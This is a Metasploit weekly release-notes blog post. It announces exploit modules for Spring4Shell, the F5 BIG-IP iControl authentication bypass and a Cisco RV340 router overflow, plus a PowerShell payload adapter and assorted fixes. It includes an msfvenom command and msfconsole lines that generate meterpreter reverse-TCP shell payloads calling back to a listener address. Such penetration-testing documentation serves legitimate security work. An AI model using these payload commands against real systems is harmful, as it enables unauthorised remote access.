Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/

Spring4Shell module

Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.

F5 BIG-IP iControl RCE via REST Authentication Bypass module

In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as root via the /mgmt/tm/util/bash endpoint.

Cisco RV340 SSL VPN RCE module

The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.

First Class PowerShell Command Payloads

Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new cmd/windows/powershell* payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.

Since these are new payload modules, they can also be generated directly using MSFVenom:

./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128

This is similar to using one of the psh- formatters with the existing -f option. However, because it’s a payload module, the additional Powershell specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting Powershell::encode_final_payload=true.

New module content (4)

• F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388 – A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
• Cisco RV340 SSL VPN RCE from pedrib, which exploits CVE-2022-20699 – A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.
• Spring Framework Class property RCE (Spring4Shell) by vleminator, which exploits CVE-2022-22965 – This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a war file, though it may be possible to bypass these limitations later.
• Powershell Command Adapter from zeroSteiner – This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.

Enhancements and features (4)

• #16529 from dwelch-r7 – This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:

use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'
to_handler

• #16538 from adfoster-r7 – The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
• #16551 from adfoster-r7 – The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
• #16553 from mauvehed – This updates Metasploit’s .github/SECURITY.md file with the latest steps to follow when raising security issues with Rapid7’s open source projects.

Bugs fixed (8)

• #16485 from jeffmcjunkin – This updates the version check for the exploit/windows/local/s4u_persistence module to allow it to run on later Windows versions.
• #16491 from adfoster-r7 – This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.
• #16531 from adfoster-r7 – This fixes a crash in various pihole modules when login authentication is required.
• #16533 from cdelafuente-r7 – This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with -w 32 or -w 64 – previously these flag values were unintentionally ignored.
• #16540 from adfoster-r7 – This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.
• #16542 from sjanusz-r7 – This fixes a bug in msfconsole’s internal book keeping to ensure that closed channels are no longer tracked.
• #16544 from adfoster-r7 – This updates post module windows/gather/ad_to_sqlite to no longer crash. The module will now additionally store the extracted information as loot.
• #16560 from Ronni3X – This updates the nessus_connect login functionality to correctly handle the @ symbol being present in the password.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.41…6.1.42
• Full diff 6.1.41…6.1.42

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).